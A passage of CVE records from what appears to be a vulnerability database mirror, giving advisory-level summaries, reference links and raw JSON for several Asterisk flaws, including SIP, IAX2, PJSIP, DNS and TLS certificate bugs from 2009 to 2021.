        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/131364/Asterisk-Project-Security-Advisory-AST-2015-003.html"
        },
        {
          "name": "74022",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/74022"
        },
        {
          "name": "MDVSA-2015:206",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2015:206"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://advisories.mageia.org/MGASA-2015-0153.html"
        },
        {
          "name": "1032052",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1032052"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2015-003.html"
        },
        {
          "name": "20150408 AST-2015-003: TLS Certificate Common name NULL byte exploit",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2015/Apr/22"
        },
        {
          "name": "20150408 AST-2015-003: TLS Certificate Common name NULL byte exploit",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/535222/100/0/threaded"
        },
        {
          "name": "DSA-3700",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2016/dsa-3700"
        },
        {
          "name": "FEDORA-2015-5948",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-July/162260.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2015-3008",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Asterisk Open Source 1.8 before 1.8.32.3, 11.x before 11.17.1, 12.x before 12.8.2, and 13.x before 13.3.2 and Certified Asterisk 1.8.28 before 1.8.28-cert5, 11.6 before 11.6-cert11, and 13.1 before 13.1-cert2, when registering a SIP TLS device, does not properly handle a null byte in a domain name in the subject\u0027s Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://packetstormsecurity.com/files/131364/Asterisk-Project-Security-Advisory-AST-2015-003.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/131364/Asterisk-Project-Security-Advisory-AST-2015-003.html"
            },
            {
              "name": "74022",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/74022"
            },
            {
              "name": "MDVSA-2015:206",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2015:206"
            },
            {
              "name": "http://advisories.mageia.org/MGASA-2015-0153.html",
              "refsource": "CONFIRM",
              "url": "http://advisories.mageia.org/MGASA-2015-0153.html"
            },
            {
              "name": "1032052",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1032052"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2015-003.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2015-003.html"
            },
            {
              "name": "20150408 AST-2015-003: TLS Certificate Common name NULL byte exploit",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2015/Apr/22"
            },
            {
              "name": "20150408 AST-2015-003: TLS Certificate Common name NULL byte exploit",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/535222/100/0/threaded"
            },
            {
              "name": "DSA-3700",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2016/dsa-3700"
            },
            {
              "name": "FEDORA-2015-5948",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-July/162260.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2015-3008",
    "datePublished": "2015-04-10T14:00:00",
    "dateReserved": "2015-04-08T00:00:00",
    "dateUpdated": "2024-08-06T05:32:21.258Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2018-19278

Vulnerability from cvelistv5

Published

2018-11-14 20:00

Modified

2024-09-16 17:39

Severity ?

Summary

Buffer overflow in DNS SRV and NAPTR lookups in Digium Asterisk 15.x before 15.6.2 and 16.x before 16.0.1 allows remote attackers to crash Asterisk via a specially crafted DNS SRV or NAPTR response, because a buffer size is supposed to match an expanded length but actually matches a compressed length.

References

▼	URL	Tags
	https://downloads.asterisk.org/pub/security/AST-2018-010.html	x_refsource_MISC
	https://issues.asterisk.org/jira/browse/ASTERISK-28127	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T11:30:04.216Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/AST-2018-010.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28127"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in DNS SRV and NAPTR lookups in Digium Asterisk 15.x before 15.6.2 and 16.x before 16.0.1 allows remote attackers to crash Asterisk via a specially crafted DNS SRV or NAPTR response, because a buffer size is supposed to match an expanded length but actually matches a compressed length."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-11-14T20:00:00Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://downloads.asterisk.org/pub/security/AST-2018-010.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28127"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2018-19278",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in DNS SRV and NAPTR lookups in Digium Asterisk 15.x before 15.6.2 and 16.x before 16.0.1 allows remote attackers to crash Asterisk via a specially crafted DNS SRV or NAPTR response, because a buffer size is supposed to match an expanded length but actually matches a compressed length."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://downloads.asterisk.org/pub/security/AST-2018-010.html",
              "refsource": "MISC",
              "url": "https://downloads.asterisk.org/pub/security/AST-2018-010.html"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-28127",
              "refsource": "MISC",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28127"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2018-19278",
    "datePublished": "2018-11-14T20:00:00Z",
    "dateReserved": "2018-11-14T00:00:00Z",
    "dateUpdated": "2024-09-16T17:39:00.255Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2011-2535

Vulnerability from cvelistv5

Published

2011-07-06 19:00

Modified

2024-08-06 23:08

Severity ?

Summary

chan_iax2.c in the IAX2 channel driver in Asterisk Open Source 1.4.x before 1.4.41.1, 1.6.2.x before 1.6.2.18.1, and 1.8.x before 1.8.4.3, and Asterisk Business Edition C.3 before C.3.7.3, accesses a memory address contained in an option control frame, which allows remote attackers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a crafted frame.

References

▼	URL	Tags
	http://secunia.com/advisories/44973	third-party-advisory, x_refsource_SECUNIA
	http://downloads.asterisk.org/pub/security/AST-2011-010-1.8.diff	x_refsource_CONFIRM
	https://exchange.xforce.ibmcloud.com/vulnerabilities/68205	vdb-entry, x_refsource_XF
	http://downloads.asterisk.org/pub/security/AST-2011-010.html	x_refsource_CONFIRM
	http://www.securityfocus.com/bid/48431	vdb-entry, x_refsource_BID
	http://securitytracker.com/id?1025708	vdb-entry, x_refsource_SECTRACK
	http://secunia.com/advisories/45239	third-party-advisory, x_refsource_SECUNIA
	http://www.debian.org/security/2011/dsa-2276	vendor-advisory, x_refsource_DEBIAN
	http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html	vendor-advisory, x_refsource_FEDORA
	http://secunia.com/advisories/45048	third-party-advisory, x_refsource_SECUNIA
	http://www.osvdb.org/73309	vdb-entry, x_refsource_OSVDB
	http://secunia.com/advisories/45201	third-party-advisory, x_refsource_SECUNIA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T23:08:22.031Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "44973",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/44973"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2011-010-1.8.diff"
          },
          {
            "name": "asterisk-iax2channeldriver-dos(68205)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/68205"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2011-010.html"
          },
          {
            "name": "48431",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/48431"
          },
          {
            "name": "1025708",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1025708"
          },
          {
            "name": "45239",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/45239"
          },
          {
            "name": "DSA-2276",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2011/dsa-2276"
          },
          {
            "name": "FEDORA-2011-8914",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html"
          },
          {
            "name": "45048",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/45048"
          },
          {
            "name": "73309",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://www.osvdb.org/73309"
          },
          {
            "name": "45201",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/45201"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2011-06-22T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "chan_iax2.c in the IAX2 channel driver in Asterisk Open Source 1.4.x before 1.4.41.1, 1.6.2.x before 1.6.2.18.1, and 1.8.x before 1.8.4.3, and Asterisk Business Edition C.3 before C.3.7.3, accesses a memory address contained in an option control frame, which allows remote attackers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a crafted frame."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-28T12:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "44973",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/44973"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2011-010-1.8.diff"
        },
        {
          "name": "asterisk-iax2channeldriver-dos(68205)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/68205"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2011-010.html"
        },
        {
          "name": "48431",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/48431"
        },
        {
          "name": "1025708",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1025708"
        },
        {
          "name": "45239",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/45239"
        },
        {
          "name": "DSA-2276",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2011/dsa-2276"
        },
        {
          "name": "FEDORA-2011-8914",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html"
        },
        {
          "name": "45048",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/45048"
        },
        {
          "name": "73309",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://www.osvdb.org/73309"
        },
        {
          "name": "45201",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/45201"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2011-2535",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "chan_iax2.c in the IAX2 channel driver in Asterisk Open Source 1.4.x before 1.4.41.1, 1.6.2.x before 1.6.2.18.1, and 1.8.x before 1.8.4.3, and Asterisk Business Edition C.3 before C.3.7.3, accesses a memory address contained in an option control frame, which allows remote attackers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a crafted frame."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "44973",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/44973"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2011-010-1.8.diff",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2011-010-1.8.diff"
            },
            {
              "name": "asterisk-iax2channeldriver-dos(68205)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/68205"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2011-010.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2011-010.html"
            },
            {
              "name": "48431",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/48431"
            },
            {
              "name": "1025708",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1025708"
            },
            {
              "name": "45239",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/45239"
            },
            {
              "name": "DSA-2276",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2011/dsa-2276"
            },
            {
              "name": "FEDORA-2011-8914",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html"
            },
            {
              "name": "45048",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/45048"
            },
            {
              "name": "73309",
              "refsource": "OSVDB",
              "url": "http://www.osvdb.org/73309"
            },
            {
              "name": "45201",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/45201"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2011-2535",
    "datePublished": "2011-07-06T19:00:00",
    "dateReserved": "2011-06-22T00:00:00",
    "dateUpdated": "2024-08-06T23:08:22.031Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2009-2726

Vulnerability from cvelistv5

Published

2009-08-12 10:00

Modified

2024-08-07 05:59

Severity ?

Summary

The SIP channel driver in Asterisk Open Source 1.2.x before 1.2.34, 1.4.x before 1.4.26.1, 1.6.0.x before 1.6.0.12, and 1.6.1.x before 1.6.1.4; Asterisk Business Edition A.x.x, B.x.x before B.2.5.9, C.2.x before C.2.4.1, and C.3.x before C.3.1; and Asterisk Appliance s800i 1.2.x before 1.3.0.3 does not use a maximum width when invoking sscanf style functions, which allows remote attackers to cause a denial of service (stack memory consumption) via SIP packets containing large sequences of ASCII decimal characters, as demonstrated via vectors related to (1) the CSeq value in a SIP header, (2) large Content-Length value, and (3) SDP.

References

▼	URL	Tags
	http://labs.mudynamics.com/advisories/MU-200908-01.txt	x_refsource_MISC
	http://www.vupen.com/english/advisories/2009/2229	vdb-entry, x_refsource_VUPEN
	http://downloads.digium.com/pub/security/AST-2009-005.html	x_refsource_CONFIRM
	http://www.securityfocus.com/bid/36015	vdb-entry, x_refsource_BID
	http://www.securityfocus.com/archive/1/505669/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://www.securitytracker.com/id?1022705	vdb-entry, x_refsource_SECTRACK
	http://secunia.com/advisories/36227	third-party-advisory, x_refsource_SECUNIA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T05:59:57.107Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://labs.mudynamics.com/advisories/MU-200908-01.txt"
          },
          {
            "name": "ADV-2009-2229",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2009/2229"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2009-005.html"
          },
          {
            "name": "36015",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/36015"
          },
          {
            "name": "20090811 AST-2009-005: Remote Crash Vulnerability in SIP channel driver",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/505669/100/0/threaded"
          },
          {
            "name": "1022705",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1022705"
          },
          {
            "name": "36227",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36227"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2009-08-11T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The SIP channel driver in Asterisk Open Source 1.2.x before 1.2.34, 1.4.x before 1.4.26.1, 1.6.0.x before 1.6.0.12, and 1.6.1.x before 1.6.1.4; Asterisk Business Edition A.x.x, B.x.x before B.2.5.9, C.2.x before C.2.4.1, and C.3.x before C.3.1; and Asterisk Appliance s800i 1.2.x before 1.3.0.3 does not use a maximum width when invoking sscanf style functions, which allows remote attackers to cause a denial of service (stack memory consumption) via SIP packets containing large sequences of ASCII decimal characters, as demonstrated via vectors related to (1) the CSeq value in a SIP header, (2) large Content-Length value, and (3) SDP."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-10T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://labs.mudynamics.com/advisories/MU-200908-01.txt"
        },
        {
          "name": "ADV-2009-2229",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2009/2229"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2009-005.html"
        },
        {
          "name": "36015",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/36015"
        },
        {
          "name": "20090811 AST-2009-005: Remote Crash Vulnerability in SIP channel driver",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/505669/100/0/threaded"
        },
        {
          "name": "1022705",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1022705"
        },
        {
          "name": "36227",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36227"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2009-2726",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The SIP channel driver in Asterisk Open Source 1.2.x before 1.2.34, 1.4.x before 1.4.26.1, 1.6.0.x before 1.6.0.12, and 1.6.1.x before 1.6.1.4; Asterisk Business Edition A.x.x, B.x.x before B.2.5.9, C.2.x before C.2.4.1, and C.3.x before C.3.1; and Asterisk Appliance s800i 1.2.x before 1.3.0.3 does not use a maximum width when invoking sscanf style functions, which allows remote attackers to cause a denial of service (stack memory consumption) via SIP packets containing large sequences of ASCII decimal characters, as demonstrated via vectors related to (1) the CSeq value in a SIP header, (2) large Content-Length value, and (3) SDP."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://labs.mudynamics.com/advisories/MU-200908-01.txt",
              "refsource": "MISC",
              "url": "http://labs.mudynamics.com/advisories/MU-200908-01.txt"
            },
            {
              "name": "ADV-2009-2229",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2009/2229"
            },
            {
              "name": "http://downloads.digium.com/pub/security/AST-2009-005.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.digium.com/pub/security/AST-2009-005.html"
            },
            {
              "name": "36015",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/36015"
            },
            {
              "name": "20090811 AST-2009-005: Remote Crash Vulnerability in SIP channel driver",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/505669/100/0/threaded"
            },
            {
              "name": "1022705",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1022705"
            },
            {
              "name": "36227",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/36227"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2009-2726",
    "datePublished": "2009-08-12T10:00:00",
    "dateReserved": "2009-08-10T00:00:00",
    "dateUpdated": "2024-08-07T05:59:57.107Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-31878

Vulnerability from cvelistv5

Published

2021-07-27 05:17

Modified

2024-08-03 23:10

Severity ?

Summary

An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request.

References

▼	URL	Tags
	http://seclists.org/fulldisclosure/2021/Jul/48	mailing-list, x_refsource_FULLDISC
	http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html	x_refsource_MISC
	http://downloads.asterisk.org/pub/security/AST-2021-007.html	x_refsource_MISC
	https://issues.asterisk.org/jira/browse/ASTERISK-29381	x_refsource_MISC
	https://downloads.digium.com/pub/security/AST-2021-007.html	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T23:10:30.837Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2021/Jul/48"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-07-27T11:10:28",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2021/Jul/48"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
